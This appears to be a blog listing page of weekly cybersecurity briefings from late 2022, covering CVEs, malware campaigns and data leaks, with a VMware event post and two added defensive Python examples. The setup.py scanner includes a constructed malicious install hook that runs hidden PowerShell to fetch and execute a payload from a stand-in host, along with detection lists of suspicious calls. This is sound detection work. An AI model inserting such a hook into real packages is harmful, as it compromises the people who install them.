Researchers from five US universities have developed EarSpy, an eavesdropping attack on Android devices capable of inferring the gender and identity of the caller. EarSpy captures motion sensor readings caused by the reverberations of the phone's earpiece speaker. Although these vibrations were previously considered too weak for this type of attack, modern smartphones with more powerful stereo speakers and more sensitive motion sensors register even small resonances. In tests on OnePlus 7T and OnePlus 9 devices, gender identification accuracy ranged from 77.7% to 98.7%, caller identification from 63.0% to 91.2% and speech recognition from 51.8% to 56.4%. Volume, device hardware and motion all affect the accuracy. Android 13 restricts the collection of sensor data without permission, but this only reduces accuracy by around 10%. More info →

* * *

Netgear fixes vulnerabilities affecting several router models
Netgear has published two security advisories reporting high-severity vulnerabilities in several of its router models. No CVE has been assigned and Netgear has not detailed which component is affected, but it notes that one of them is a pre-authentication buffer overflow. Exploitation of this type of vulnerability can result in anything from a denial of service to arbitrary code execution, without requiring privileges or user interaction. The affected products include several Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6) and Wireless AC router models. Exploitation of the second vulnerability could allow a denial of service against Wireless AC Nighthawk and Wireless AX Nighthawk (WiFi 6) routers. More info →
December 30, 2022
Cyber Security
Cyber Security Weekly Briefing, 17 – 23 December
SentinelOne: malicious Python package in PyPI
Researchers at ReversingLabs have identified a Python package in PyPI that masquerades as the legitimate SDK client of the cybersecurity firm SentinelOne. The attackers named the package after the company to trick victims, and it does offer working functionality for accessing the SentinelOne API from another project; alongside it, however, the package contains obfuscated code dedicated to exfiltrating sensitive data from compromised systems. ReversingLabs detected five similarly named packages uploaded by the same authors between 8 and 11 December 2022 and estimates that they were downloaded up to 1,000 times in total. More info →

* * *

OWASSRF: new Microsoft Exchange exploit method
The CrowdStrike team has discovered a new method of exploiting Microsoft Exchange that bypasses the ProxyNotShell mitigations. The technique, which they have named OWASSRF, was found while analysing the initial access vectors of the Play ransomware: the researchers suspected the operators were exploiting ProxyNotShell (CVE-2022-41040 and CVE-2022-41082), but found evidence of exploitation of CVE-2022-41082 only and none of CVE-2022-41040. According to CrowdStrike, the flaw used for initial access, which is then chained with CVE-2022-41082, is CVE-2022-41080, a privilege escalation vulnerability via the Outlook Web Access (OWA) endpoint with a CVSSv3 of 8.8. During the investigation, Huntress Labs threat researcher Dray Agha discovered an attacker's tools exposed in an open repository, including a PoC for Play's Exchange exploit, which allowed CrowdStrike to replicate the attacks. More info →

* * *

Achilles: vulnerability in Apple Gatekeeper
Microsoft has disclosed details of a macOS vulnerability that allows bypassing the application execution restrictions of Apple's Gatekeeper security mechanism. The vulnerability, CVE-2022-42821 with a CVSS of 5.5, was discovered by the Microsoft team in July and fixed in last week's updates for macOS 13 (Ventura), macOS 12.6.2 (Monterey) and macOS 11.7.2 (Big Sur). Gatekeeper checks applications downloaded from the Internet to see whether they are approved by Apple, asking the user to confirm before launching them or warning that the application cannot be run because it is untrusted. This check relies on the com.apple.quarantine extended attribute that web browsers set on downloaded files. The vulnerability, dubbed Achilles, abuses the Access Control List (ACL) permissions model by adding very restrictive permissions to a downloaded file, which prevents Safari from setting the com.apple.quarantine attribute; an attacker could thus craft a malicious application that runs without Gatekeeper checks and serves as an initial access vector for malware or other threats. More info →

* * *

Glupteba botnet active again
Researchers at Nozomi Networks have found that the Glupteba botnet is active again, a year after Google disrupted its operation. According to the researchers, the latest campaign began in June this year and is still ongoing. Glupteba is a backdoor distributed through pay-per-install (PPI) networks in infected installers or software cracks. It infects Windows devices to mine cryptocurrency, steal user credentials and cookies, and deploy proxies on IoT devices and Windows systems. Its defining feature is the use of the Bitcoin blockchain to distribute its command and control (C2) domains, which makes it highly resistant to takedown, since a confirmed Bitcoin transaction cannot be deleted or censored. Nozomi has observed the number of Bitcoin addresses in use growing over time: the first campaign, in 2019, used a single address, whereas up to seventeen different addresses have been seen in the latest one. More info →
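The SentinelOne-themed package above and the Lolip0p packages reported by Fortinet in the 14–20 January briefing share one trait: the malicious behaviour runs at install time, from setup.py or a custom setuptools command, before anyone imports the package. The scanner below is an added example, not ReversingLabs' or Fortinet's tooling. It parses a setup.py with Python's ast module and reports process execution, download and dynamic-evaluation calls (resolving import aliases so `import subprocess as sp; sp.run(...)` is still caught), subclasses of setuptools install commands, and string literals that mention PowerShell or a URL. Both setup.py samples are constructed for the example; the package name and version in the malicious one are illustrative.

```python
"""Static scan of a package's setup.py for install-time execution (added example)."""
import ast
from typing import List, Tuple

SUSPICIOUS_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "os.system", "os.popen", "os.startfile", "os.execv",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "base64.b64decode", "ctypes.windll", "exec", "eval", "__import__", "compile",
}
# setuptools command classes whose run() executes during `pip install`.
COMMAND_CLASSES = {"install", "develop", "egg_info", "build_py", "sdist"}
STRING_MARKERS = ("powershell", "cmd.exe", "http://", "https://")


def _dotted_name(node: ast.AST):
    """'a.b.c' for Attribute/Name chains, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _collect_aliases(tree: ast.AST) -> dict:
    """Map local names to fully qualified names from import statements."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
                else:
                    top = a.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def scan_setup_py(source: str) -> List[Tuple[int, str, str]]:
    """Return sorted (line, kind, detail) findings for a setup.py source."""
    tree = ast.parse(source)
    aliases = _collect_aliases(tree)

    def resolve(name: str) -> str:
        head, _, rest = name.partition(".")
        return aliases.get(head, head) + (f".{rest}" if rest else "")

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name and resolve(name) in SUSPICIOUS_CALLS:
                findings.append((node.lineno, "call", resolve(name)))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                b = _dotted_name(base)
                if b and resolve(b).split(".")[-1] in COMMAND_CLASSES:
                    findings.append((node.lineno, "cmdclass", f"{node.name} subclasses {resolve(b)}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(marker in node.value.lower() for marker in STRING_MARKERS):
                findings.append((node.lineno, "string", node.value[:60]))
    return sorted(findings)


# Constructed samples (not the real packages' setup files).
MALICIOUS_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command",
                          "iwr https://example.invalid/payload.exe -OutFile p.exe; ./p.exe"])

setup(name="colorslib", version="4.6.11", cmdclass={"install": PostInstall})
'''

BENIGN_SETUP_PY = '''\
from setuptools import setup
setup(name="hello", version="1.0.0", packages=["hello"])
'''

if __name__ == "__main__":
    for line, kind, detail in scan_setup_py(MALICIOUS_SETUP_PY):
        print(f"line {line:>3}  {kind:<9} {detail}")
    print("benign:", scan_setup_py(BENIGN_SETUP_PY))
```

Run it over the sdist of anything you are about to install (`pip download --no-binary :all: --no-deps <pkg>`, then unpack and scan setup.py). A hit is not proof of malice, since legitimate packages do compile native code at install time, but a library whose only job is an API client has no reason to launch PowerShell or fetch a URL while being installed.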
December 23, 2022
Cyber Security
Cyber Security Weekly Briefing, 10 – 16 December
Microsoft fixes in its December Patch Tuesday two 0-day vulnerabilities and 49 other bugs Among the fixed vulnerabilities, two of them are 0-day, one of them actively exploited and identified as CVE-2022-44698 and CVSS 5.4, which refers to a bypass vulnerability in the Windows SmartScreen security feature. An attacker could exploit this vulnerability by creating a malicious file that bypasses Mark Of The Web (MOTW) security, resulting in the loss of security features such as protected view in Microsoft Office. Threat actors exploited this vulnerability through malicious JavaScript files in numerous malware distribution campaigns. The other 0-day, identified as CVE-2022-44710 and CVSS 7.8, would allow privilege escalation of the DirectX graphics kernel. The rest of the fixed bugs would allow information disclosure, denial of service and impersonation. Finally, Microsoft has included in its update, 29 improvements and fixes among which fix problems in Task Manager, Microsoft OneDrive or Windows Spotlight. More info → * * * Citrix fixes actively exploited 0-day vulnerability Citrix has issued a security alert warning administrators of a critical, actively exploited, 0-day vulnerability affecting Citrix ADC and Gateway. This flaw, tracked as CVE-2022-27518 and still awaiting CVSS score, would allow an attacker to remotely execute code without authentication. Affected Citrix ADC and Citrix Gateway versions would be those prior to 13.0-58.32 and would be corrected by updating to current 13.0-88.16 or 13.1 versions. Although the company has not yet offered any further details, the security note mentions a small number of targeted attacks taking advantage of this vulnerability. The National Security Agency has issued an advisory stating that the attacks would be attributed to the group known as APT5, UNC2630 or MANGANESE and includes detection and mitigation steps. 
More info → * * * New Apple 0-day vulnerability exploited Apple has released the monthly security bulletin fixing vulnerabilities affecting iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2 and macOS Ventura 13.1, including the tenth 0-day of the year affecting iPhone devices, which could be actively exploited. Specifically, this security flaw identified as CVE-2022-42856 is a problem in Apple's Webkit browser engine, which could allow threat actors to create a malicious website specially designed to use code execution on a vulnerable device. This vulnerability was discovered by security researcher Clément Lecigne, a member of Google's threat analysis team, and although no further details on this issue are available now, it is expected that more information on this vulnerability will be published sometime after the patches are released once users update their devices. More info → * * * Royal ransomware becomes a potential threat Researchers from Cybereason Global SOC and Cybereason Security Research Teams have published an analysis of the Royal ransomware group, describing its tactics, techniques and procedures (TTP). The ransomware was detected earlier this year, but it was not until September that it began using its own ransomware, making it the most active ransomware at the moment, surpassing Lockbit. Royal's entry vectors are diverse, one of them being through phishing campaigns, also using loaders such as Qbot or BATLOADER, which subsequently implement a Cobalt Strike payload to continue the infection operation. The ransomware is also known to employ multiple threads to speed up encryption, and to use partial encryption, making detection more difficult. Researchers estimate that Royal is made up of former members of other ransomware groups, specifically pointing to Conti. Cybereason also points out that Royal ransomware is a high-potential threat, because its victims are not sector-specific and are spread across the globe. 
More info →
* * *
Atlassian cookies allow unauthorized access even with two-factor login enabled
Security company CloudSEK was recently the victim of a cyberattack, and its internal investigation has uncovered a vulnerability in Atlassian products. CloudSEK identified that the threat actor gained access to an employee's Jira account using a session cookie that had been stolen by information-stealing malware and sold on the dark web. The investigation revealed that session cookies in Atlassian products (Jira, Confluence, Trello and Bitbucket) remain valid for 30 days even if the user's password has been changed or two-factor authentication has been enabled. Atlassian has not yet patched the vulnerability, so CloudSEK warns of the wide-ranging impact it could have, given that it affects more than 10 million users across the 180,000 companies that use Atlassian products.
More info →
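As an added example (not code from CloudSEK, Atlassian or the original briefing), the following Python sketch shows one server-side design that avoids the gap described above: every session snapshots a per-user credential generation counter, and a password change or 2FA enrolment bumps that counter, so cookies minted before it are rejected even though their 30-day expiry has not passed. The class and field names, the HMAC-keyed session table and the 30-day TTL constant are assumptions made for the illustration.

```python
"""Added example (not CloudSEK's, Atlassian's or the briefing's own code):
a session store that binds every session to the user's "credential generation",
so a password change or 2FA enrolment rejects all cookies issued before it,
even though their 30-day expiry has not yet passed."""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional

SESSION_TTL_SECONDS = 30 * 24 * 3600  # the 30-day cookie lifetime described above


@dataclass
class User:
    name: str
    mfa_enabled: bool = False
    # Bumped on every credential event (password change, 2FA enrolment,
    # "log out everywhere"); an assumed field, not an Atlassian data model.
    credential_generation: int = 0


@dataclass
class SessionRecord:
    user: str
    credential_generation: int  # snapshot taken when the cookie was issued
    expires_at: float


class SessionStore:
    def __init__(self, server_secret: bytes) -> None:
        self._secret = server_secret
        self._users: Dict[str, User] = {}
        # Keyed by an HMAC of the cookie value, so a leaked session table
        # does not hand out usable cookies.
        self._sessions: Dict[str, SessionRecord] = {}

    def add_user(self, user: User) -> None:
        self._users[user.name] = user

    def _key(self, token: str) -> str:
        return hmac.new(self._secret, token.encode(), hashlib.sha256).hexdigest()

    def login(self, username: str, now: Optional[float] = None) -> str:
        """Issue a new cookie value whose record snapshots the current generation."""
        now = time.time() if now is None else now
        user = self._users[username]
        token = secrets.token_urlsafe(32)
        self._sessions[self._key(token)] = SessionRecord(
            user=username,
            credential_generation=user.credential_generation,
            expires_at=now + SESSION_TTL_SECONDS,
        )
        return token

    def validate(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the username for an acceptable cookie, or None to reject it."""
        now = time.time() if now is None else now
        key = self._key(token)
        rec = self._sessions.get(key)
        if rec is None:
            return None
        if now >= rec.expires_at:
            self._sessions.pop(key, None)
            return None
        user = self._users[rec.user]
        # The check that closes the gap described in the briefing: a cookie
        # minted before the last credential change is stale regardless of TTL.
        if rec.credential_generation != user.credential_generation:
            self._sessions.pop(key, None)
            return None
        return rec.user

    def change_password(self, username: str) -> None:
        # Real code would also store the new password hash; only the
        # invalidation side effect matters for this example.
        self._users[username].credential_generation += 1

    def enable_mfa(self, username: str) -> None:
        user = self._users[username]
        user.mfa_enabled = True
        user.credential_generation += 1

    def active_sessions(self, username: str, now: Optional[float] = None) -> int:
        """Count sessions for a user that validate() would still accept."""
        now = time.time() if now is None else now
        user = self._users[username]
        return sum(
            1 for rec in self._sessions.values()
            if rec.user == username
            and now < rec.expires_at
            and rec.credential_generation == user.credential_generation
        )
```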
December 16, 2022
Cyber Security
Cyber Security Weekly Briefing, 3 – 9 December
Ninth Chrome 0-day of the year
Google has released Chrome 108.0.5359.94 for Mac and Linux, and 108.0.5359.94/.95 for Windows, fixing a 0-day vulnerability, the ninth detected in Chrome this year. Catalogued as CVE-2022-4262 and rated high severity by Google, it is described as a type confusion in V8 in Google Chrome prior to 108.0.5359.94. Exploitation of this flaw could allow a remote attacker to potentially exploit stack corruption via a crafted HTML page. Google is withholding further details of the flaw, which was reported by Clément Lecigne of Google's Threat Analysis Group on 29 November, until most users have updated their browsers. It is worth noting that the company's security advisory states that an exploit for this vulnerability already exists.
More info →
* * *
RCE vulnerability in Visual Studio Code
Google security researcher Thomas Shadwell has identified an important vulnerability in Visual Studio Code. The flaw, identified as CVE-2022-41034 with a CVSSv3 score of 7.8, could allow malicious actors to achieve remote code execution and take control of the victim's computer. The attack consists of sending the victim a link to a website in order to take over the Visual Studio Code user's computer, and any other device connected through Visual Studio Code's remote development feature. According to the researcher, the issue affects GitHub Codespaces, github.dev and the web and desktop versions of Visual Studio Code. It should be noted that this remote code execution vulnerability affects VS Code 1.71 and earlier versions, and it is recommended to apply the patch released by Microsoft to fix it.
More info →
* * *
Vulnerability in Netgear routers patched urgently
In the context of Pwn2Own Toronto 2022, a bug hunting competition held as part of the CanSecWest security conference since 2007, Netgear has been forced to patch a vulnerability as a matter of urgency. Researchers at Tenable have published an article in which, based on the code published by Netgear to mitigate the vulnerability in Netgear Nighthawk WiFi 6 router (RAX30 AX2400 series) devices, they reveal details of the patched bug: a network-level configuration error whereby access restriction policies were not applied correctly when the devices had an exposed IPv6 interface. The vulnerability, which at the time of writing has not yet been assigned a CVE, is mitigated by updating to version 1.0.9.90 or later, as proposed by the manufacturer. Following Tenable's guidance, it is recommended to check the firmware version manually, since devices running versions later than v1.0.6.74 are not able to auto-update.
More info →
* * *
High severity vulnerability in Cisco IP phone devices
Cisco has issued a security advisory warning of a high-severity vulnerability affecting several models of its IP phones. The flaw, catalogued as CVE-2022-20968 with a CVSSv3 score of 8.1, could allow a malicious actor to cause a stack overflow, leading to remote code execution or a denial of service (DoS). While the company's security incident response team is aware of a proof of concept, it has no evidence that the flaw has been exploited in attacks. Cisco has indicated that it will release a security patch in January 2023; until then it recommends, as mitigation, disabling Cisco Discovery Protocol on the affected devices, which are IP Phone 7800 and 8800 Series models running firmware version 14.2 and earlier.
More info →
* * *
Zombinder: app repackaging service containing malware
Researchers at ThreatFabric have published an article detailing a service on the dark web, which they have named Zombinder, that allows threat actors to add malware to legitimate apps in order to evade security controls. The researchers point out that applications repackaged with Zombinder keep 100 per cent of their original functionality, so the victim does not suspect that they have been infected with malicious software, usually of the stealer type. ThreatFabric reports that, in applications modified by Zombinder, they have mainly identified the clipper known as "Laplas" and well-known information stealers such as "Ermac", "Erbium" and "Aurora". The service targets users of both Windows and Android apps.
More info →
December 9, 2022
Cloud
VMware Explore '22 leverages interoperability among multiple & Cross-Cloud environments
Written by Matheus Bottan, Partner Development at Telefónica Tech

Formerly dubbed VMworld (the brand that stamped the first editions since 2004), suffice it to say that VMware Explore is a giant pivot in the evolution of the software industry and is entrenched among the "don't-miss events" for the IT marketplace and those interested in modern app infrastructure. During the last VMware Explore (Europe edition), in Barcelona this November, attendees had, as usual, a vast range of activities to take part in, going from general keynote sessions with VMware executives to hands-on labs and hackathons with the cloud and security experts of Tanzu, vSphere+ and NSX.

My personal experience at VMware Explore 2022
I focused on the partner sessions for professional reasons, went to a few tech sessions, and, for fun, stood about 30 minutes in the biggest queue of the event to try the McLaren Racing F1 simulator (a disastrous 3 laps).

Matheus Bottan at VMware Explore Europe 2022

Personally, what I take from the event is the certainty that the adoption of cross-multi-cloud environments will never stop, as admins will keep running their workloads in the cloud that best suits each app. Meaning, you'll run artificial intelligence on Google Cloud Platform; workplace, in Azure; critical instances, on AWS; and so on. You'd also keep top-secret, state-of-the-art stuff in some private cloud (e.g. Dell, HP, Oracle, Alibaba, etc.), let alone the sovereign cloud projects of the near future.

New tech trends
That said, we cannot not mention K8. The motto of the event was "any app, any cloud, any K8". For those not familiar with the acronym, I'm sure you know it by its "scientific" name: Kubernetes. Google open-sourced the Kubernetes project in 2014.

Telefónica Tech's Lounge at VMware Explore Europe 2022

Similar to what VMware did a decade ago with virtual machines, K8 is now the new reality for building complex applications and it is helping to pave the way, not only to the workplace of the future, but to whole new sectors such as Clean & Bio Tech, Future Hyper-Connectivity & Cybersecurity, Space Tourism and Quantum Computing, to name a few. VMware's Tanzu platform is ready to address and orchestrate the multi-cloud environments needed for these types of cutting-edge deployments. The next wave of tech trends will be a reality pretty soon, and K8 certainly takes part in that evolution: as containerized apps push cybersecurity and IoT/OT (operational technology) to evolve, new kinds of network traffic emerge and new methods of deploying software appear, K8 will also evolve within its own chapters, and it seems to be future-proof, as it provides portability of workloads and is widely adopted across all industries. I'll elaborate on a few of those future trends and speculate a bit around them, as an exercise in matching them to the subjects of the technical sessions of VMware Explore Europe 2022:

Trust Architectures in Cybersecurity: new types of cybercrime will pop up in the coming decades due to the evolution of machines and software; as a growing tech trend, trust architectures will help in the fight against future cybercrime.
Future of Hyper-connectivity: IoT will be in virtually every device by ~2050, meaning supercomputing power and hyper-connectivity will be needed, which will be provided by laser communications technologies and interconnected satellites.
Next-Generation Computing Power: shifting from CPU to GPU (or even DPU offloads) will be an ancient topic by ~2040, as real quantum computing will help us find answers to problems that have bedeviled science and society for centuries.
Coding 2.0: this is my personal favorite, as I look back to my early career days. From ~2030 on, we'll start to see the new coding platforms, where artificial intelligence writes the code and you just watch for debris and deviations. Welcome to software 2.0, or whatever you want to call the workstation of the developer of the future.
True integration of Artificial Intelligence & Robotics: just imagine self-replicating nanorobots that can do the dirty work in several critical circumstances, from medical emergencies to space exploration, from extreme farming to rescuing people.
Clean Tech: of course, energy will always be a concern for the coming world, and here Kubernetes is a protagonist and an early adopter with its highly energy-efficient environments; it will help companies meet net-zero and ESG standards.

How Telefónica Tech backs VMware technologies and promotes co-innovation projects

Emilio Moreno, Product Manager at Telefónica Tech, during our presentation at VMware Explore Europe 2022

Telefónica Tech has a huge portfolio of distinct customers in the multi-cloud world and is a leader in the digital transformation of our B2B customers, as recognized by industry analysts. Partnering with VMware is key not only to our projects with end users, but also to the internal use of VMware technologies inside our house to build the best managed services we possibly can, as we have been doing for many years, since Telefónica first adopted VMware solutions in our VDC core and edge computing nodes. Stay tuned for more about the new Telefónica Tech & VMware product roadmaps and co-innovation projects. If you're a customer, reach out to us to learn more about our multi-cloud orchestration SKUs running VMware technology. See you soon at the next VMware Explore '23!
December 5, 2022
Cyber Security
Cyber Security Weekly Briefing, 26 November – 2 December
Urgent update to Chrome to prevent the eighth 0-day of 2022
Google has released an urgent security update for Chrome to prevent exploitation of the eighth 0-day found in the browser in 2022. The release patches CVE-2022-4135, a stack overflow issue, a type of vulnerability that could allow an attacker to execute arbitrary code. Google became aware that the vulnerability was being actively exploited by malicious actors, and released the patch just days after its Threat Analysis Group discovered it. The company has declined to provide details of the problem until users have had time to apply the patch, to prevent its exploitation from spreading. Chrome users are advised to update to version 107.0.5304.121/122 for Windows and 107.0.5304.122 for Mac and Linux, which fixes CVE-2022-4135.
More info →
* * *
Data of 5.4 million Twitter users exposed
Security researcher Chad Loder posted on Twitter that a database containing 5.4 million entries was being shared for free on a dark web forum, and that it collected both public information (usernames, IDs, followers, location, biography, etc.) and confidential information (phone numbers and email addresses) on users of the social network itself. After the post, Twitter suspended Loder's account, so he shared the information via Mastodon. According to Loder, this is the same database that was offered for sale in July, obtained by exploiting a (now patched) vulnerability in Twitter's API that allowed an attacker to learn the account associated with a phone number or email address. When the sale of the database came to light, Twitter acknowledged its authenticity.
More info →
* * *
Phishing ring that defrauded 12 million euros broken up in Spain
The Spanish National Police has issued a statement reporting the success of an operation that led to the dismantling of a criminal group that had defrauded almost 300 victims of more than 12 million euros through phishing. The six people arrested in Madrid and Barcelona have been charged with alleged membership of a criminal organisation, fraud, money laundering and usurpation of civil status (identity theft). According to the police statement, the investigation began with a complaint from a Spanish bank that was being impersonated by the criminals, who, through fake websites, offered French customers equity trading, cryptocurrency operations and the contracting of financial products. The police have not made public the malicious URLs used by the organisation.
More info →
* * *
Three vulnerabilities in industrial products from Festo and Codesys
Forescout researchers have discovered three vulnerabilities in industrial automation products from Festo and Codesys. The most critical of the three is CVE-2022-3270 which, pending publication at NIST, Forescout has preemptively given a CVSS score of 9.8. The flaw lies in Festo PLCs and would allow an unauthenticated attacker to take control of the device or cause a denial of service (DoS). CVE-2022-4048, which Forescout has scored with a CVSS of 7.7, affects Codesys V3 products and is a weak coding issue that would allow an attacker to manipulate the product's logic. Finally, CVE-2022-3079, with a CVSS of 7.5, allows an unauthenticated attacker to remotely access critical functions of the product's web interface and could lead to a denial of service. At this time, no patches have been released for these vulnerabilities.
More info →
* * *
Google's research on the Heliconia framework
Google's Threat Analysis Group (TAG) has published the results of an investigation into an exploitation framework that targets already patched vulnerabilities in Chrome, Firefox and Microsoft Defender and could deploy a payload, in particular spyware, on affected devices. Google researchers became aware of the framework through an anonymous submission to its Chrome bug-reporting program, which contained three bugs, along with instructions and a source code file. "Heliconia Noise" deploys an exploit for a Chrome renderer bug followed by a sandbox escape; "Heliconia Soft" deploys a PDF containing a Windows Defender exploit; and "Heliconia Files" contains a set of Firefox exploits for Windows and Linux. According to Google, although no active exploitation has been detected, the vulnerabilities were most likely exploited as 0-days before being fixed in 2021 and early 2022. It should also be noted that, thanks to analysis of the source code, Google has been able to trace the origin of the Heliconia framework and link its development to the Barcelona-based company Variston IT, a provider of security solutions according to its website.
More info →
December 2, 2022
Cyber Security
Cyber Security Weekly Briefing, 11 – 18 November
Security updates for 35 Cisco vulnerabilities
Cisco has released a security update that addresses 35 vulnerabilities in Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD) and Firepower Management Center (FMC). Eight of the 35 are of high severity, the highest being CVE-2022-20946 and CVE-2022-20947 (both with a CVSS score of 8.6), which affect Cisco ASA and Cisco FTD products and could be exploited by an unauthenticated attacker to cause a denial-of-service (DoS) condition. CVE-2022-20927 (CVSS 7.7), which affects the same products and could also lead to a DoS condition, also stands out. Among the remaining bugs, 15 cross-site scripting (XSS) vulnerabilities in the Cisco FMC interface are notable. According to Cisco's bulletin, there are no known active exploits against any of the newly patched vulnerabilities.
More info →
* * *
Large-scale Fangxiao campaign impersonating hundreds of companies
The Cyjax team has published research into a sophisticated large-scale campaign in which malicious actors allegedly created and used more than 42,000 web domains. According to the researchers, the Fangxiao group was behind the campaign, whose modus operandi consists of sending links via WhatsApp that redirect the user to a domain controlled by the attackers, where well-known companies are impersonated. More than 400 impersonated companies in sectors such as banking, retail, energy and travel have been detected so far. After completing an initial survey under the pretext of winning prizes, users are redirected again to other, constantly changing domains, ending in the download of an application carrying the Triada trojan. In other cases, the fraudulent scheme redirects users to Amazon's website via an affiliate link that earns a commission for whoever controls the final redirection. Cases have also been detected where users are referred to a micro-payment SMS scam.
Cyjax indicates that the campaign is aimed at users all over the world.
More info →
* * *
Mozilla fixes multiple vulnerabilities
Mozilla has announced the release of Firefox 107, in which numerous vulnerabilities have been fixed. A total of 19 vulnerabilities are addressed in this version, nine of which Mozilla has categorised as high impact. Most of these are memory-safety bugs that could lead to program crashes, alongside others that could lead to information disclosure or to the suppression of notifications in order to carry out phishing attacks. An example is CVE-2022-45407, whereby an attacker could load a legitimate font file and trigger a crash, a flaw Mozilla calls a "potentially exploitable crash". Another of the fixed vulnerabilities, CVE-2022-45404, is described as a "full screen notification bypass". These bugs have also been fixed in Mozilla Thunderbird with version 102.5.
More info →
* * *
New details on the latest Emotet campaign
Following the detection of new Emotet infections at the beginning of November, numerous researchers have analysed in detail the latest campaign, carried out between 2 and 11 November. As initially reported by Cryptolaemus researchers, one of the most notable changes in this email campaign compared to previous ones is that the malicious actors (TA542) instruct victims to copy the malicious Excel attachment to the Templates folder, where macro protection is not enabled. In addition, new features have been detected in the Emotet binary, as well as a return to delivering other malware families, which have been observed spreading new variants of the IcedID loader or Bumblebee.
According to research published by Proofpoint, this campaign has attempted to deliver hundreds of thousands of emails every day, with different lures and written in several languages, reaching victims in Spain, Mexico, Greece, Brazil, the United States, the United Kingdom, Japan, Germany, Italy and France, among others. Although no activity has been detected since the 11th, it is considered very likely that TA542 will soon distribute Emotet again, as its network is once more fully operational.
More info →
* * *
Qbot changes to misuse Windows 10 control panel
The security researcher known on Twitter as "proxylife" (@pr0xylife) has uncovered a phishing campaign involving the Qbot malware, also known as Qakbot, which has moved from exploiting a vulnerability in the Windows 7 calculator to exploiting a bug in the 'control.exe' executable of the Windows 10 control panel. Qbot creates a malicious DLL file with the same name and in the same folder as the legitimate DLL, causing Windows to run it and download the trojan onto the victim's computer. In this way it also manages to evade antivirus protection, since a program launched from the Windows 10 control panel will not be flagged as malicious. Once installed on the target computer, Qbot steals emails for use in phishing campaigns, or can be used to download other malware such as Brute Ratel or Cobalt Strike.
More info →
November 18, 2022
Cyber Security
Cyber Security Weekly Briefing, 5 - 11 November
Robin Banks Phishing Platform Reactivated
Researchers at IronNet have published the second part of their investigation into the Robin Banks phishing-as-a-service platform. The platform was discovered in June this year following the detection of a massive phishing campaign against US financial institutions, after which it was blocked by Cloudflare and its operations were halted. The platform is now reportedly back in business through the Russian ISP DDoS-Guard, incorporating new features such as multi-factor authentication and Adspect redirectors, which help it avoid detection by redirecting suspicious traffic to legitimate-looking websites. In addition, Robin Banks now makes use of Evilginx2, a proxy that captures victims' session cookies and helps attackers evade protection measures such as two-factor authentication.
More info →
* * *
Cybersecurity incident at an Orange provider
Orange has revealed that one of its suppliers suffered a cybersecurity incident that resulted in the compromise of personal information belonging to the telecommunications company's customers. According to the company's statement, the incident at the provider occurred several days ago and involved unauthorised access to systems. As a result, the data of a limited number of customers, who have already been notified by Orange via SMS or email, has been compromised. The exposed data may include customers' name, postal address, email address, telephone number, ID number, date of birth or bank IBAN, although not all of these fields were exposed in every affected case. No passwords or credit card details were compromised. The company cut off access to the systems when it became aware of the attack, and notified the Spanish Data Protection Agency and the Central Technological Investigation Brigade (BCIT) of the National Police.
More info (PDF) →
* * *
Microsoft fixes 68 vulnerabilities including six 0-day vulnerabilities
In its latest security update, Microsoft has fixed a total of 68 vulnerabilities, six of them actively exploited 0-day flaws:
CVE-2022-41128, a remote code execution vulnerability with a CVSS score of 8.8.
CVE-2022-41091, which would allow an attacker to evade Mark-of-the-Web (MOTW) security defences, with a CVSS score of 5.4.
CVE-2022-41073 and CVE-2022-41125, which would allow a malicious actor to gain SYSTEM privileges, both with a CVSS score of 7.8.
CVE-2022-41040 and CVE-2022-41082, privilege escalation and remote code execution vulnerabilities in Microsoft Exchange with a CVSS score of 8.8. These last two are the vulnerabilities identified last September as ProxyNotShell.
Other vulnerabilities categorised by Microsoft as critical and fixed in this update are CVE-2022-37966 and CVE-2022-37967 in Windows Kerberos, CVE-2022-41080 in Microsoft Exchange Server and CVE-2022-38015 in Windows Hyper-V.
More info →
* * *
Critical vulnerabilities in Citrix Gateway and Citrix ADC
In its security bulletin released on Tuesday, Citrix has announced three vulnerabilities affecting its Citrix Gateway and Citrix ADC software that users urgently need to patch. Of these, CVE-2022-27510 (CVSS 9.8) stands out as a critical flaw that allows the authentication process to be bypassed through alternative channels or paths when the appliance is configured as a VPN. The other two vulnerabilities are also rated critical by NIST, although Citrix has downgraded them to high and medium severity respectively.
These are CVE-2022-27513 (CVSS 9.6 according to NIST, 8.3 according to the manufacturer), which allows attackers to take control of the remote desktop via phishing because the authenticity of data is not correctly verified when the RDP proxy is configured in VPN mode; and CVE-2022-27516 (CVSS 9.8 according to NIST, 5.6 according to the manufacturer), which allows the protection mechanism against brute-force login attempts to be circumvented. This last vulnerability can be exploited in VPN mode or when the appliance is configured as an AAA virtual server with a maximum number of login attempts. The company has already patched these flaws for customers of its cloud services, but users who manage this software themselves will have to patch individually.
More info →
* * *
StrelaStealer: new malware to steal email credentials
Researchers at DCSO CyTec have identified a new malware, named StrelaStealer, that steals email credentials from Outlook and Thunderbird. The malware is distributed via ISO files attached to emails with varying content. In one of the variants observed, the attachment was a polyglot file, which can be interpreted as different formats depending on the application that opens it. In the case analysed, this file could either download StrelaStealer or display a decoy document in the default browser. The campaign was reportedly first observed in November 2022, targeting Spanish-speaking users.
More info →
November 14, 2022
Cyber Security
Cyber Security Weekly Briefing, 21-28 October
